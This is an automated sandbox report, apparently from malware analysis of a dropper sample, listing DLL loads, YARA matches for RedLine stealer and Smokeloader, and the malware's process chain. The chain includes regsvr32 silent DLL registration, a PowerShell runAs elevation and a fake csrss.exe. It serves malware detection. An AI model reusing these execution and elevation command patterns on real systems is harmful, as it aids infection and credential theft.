                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: msacm32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: explorerframe.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sfc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sfc_os.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: S23UhdW5DH.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 27.0.356F.exe.fe0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
                Source: C:\Users\user\AppData\Local\Temp\356F.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: S23UhdW5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1199.dll.2.drStatic PE information: Section: .text IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 572.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 66E0.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rghwvve.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: csrss.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: _RegDLL.tmp.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: syncUpd[1].exe.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nsx5151.tmp.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1199.dll.2.drStatic PE information: Section: nqb ZLIB complexity 0.9943938078703703
                Source: 1199.dll.2.drStatic PE information: Section: HIcf6ht ZLIB complexity 0.990925746681416
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@81/130@831/100
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,17_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555D0
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,18_2_00455DF8
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_005DF950 CreateToolhelp32Snapshot,Module32First,0_2_005DF950
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,17_2_00409BEC
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghwvveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeMutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
                Source: C:\ProgramData\Drivers\csrss.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3728:64:WilError_03
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE8B.tmpJump to behavior
                Source: Yara matchFile source: 35.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000000.2524392182.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: S23UhdW5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: S23UhdW5DH.exeReversingLabs: Detection: 44%
                Source: S23UhdW5DH.exeVirustotal: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\S23UhdW5DH.exe C:\Users\user\Desktop\S23UhdW5DH.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\rghwvve C:\Users\user\AppData\Roaming\rghwvve
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FE8B.exe C:\Users\user\AppData\Local\Temp\FE8B.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exe
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93B.exe C:\Users\user\AppData\Local\Temp\93B.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\93B.exe "C:\Users\user\AppData\Local\Temp\93B.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe C:\Users\user\AppData\Local\Temp\1EB9.exe
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe "C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\356F.exe C:\Users\user\AppData\Local\Temp\356F.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\nsx5151.tmp C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FE8B.exe C:\Users\user\AppData\Local\Temp\FE8B.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93B.exe C:\Users\user\AppData\Local\Temp\93B.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dllJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe C:\Users\user\AppData\Local\Temp\1EB9.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\356F.exe C:\Users\user\AppData\Local\Temp\356F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exeJump to behavior
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\nsx5151.tmp C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
